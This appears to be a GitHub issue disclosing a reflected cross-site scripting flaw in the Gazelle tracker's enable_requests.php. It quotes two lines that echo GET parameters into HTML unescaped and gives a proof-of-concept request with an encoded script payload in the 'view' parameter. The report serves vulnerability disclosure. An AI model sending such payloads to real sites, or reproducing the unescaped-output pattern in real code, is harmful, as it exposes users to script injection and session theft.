-
Notifications
You must be signed in to change notification settings - Fork 358
Open
Description
Hello,
I would like to report for a XSS vulnerability in gazelle commit 63b3370
In file https://github.com/WhatCD/Gazelle/blob/master/sections/tools/managers/enable_requests.php
<input type="hidden" name="view" value="<?=$_GET['view']?>" /> // Line 159
<td><input type="text" name="username" value="<?=$_GET['username']?>" /></td> // Line 164
...
// There are still many unchecked outputsSource from $_GET['view'] without any filtering or checking which resulting in XSS.
Poc
GET sections/tools/managers/enable_requests.php?view=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
Manual verification
BTW,cms.gazelle.com in local(changes hosts)
Metadata
Metadata
Assignees
Labels
No labels

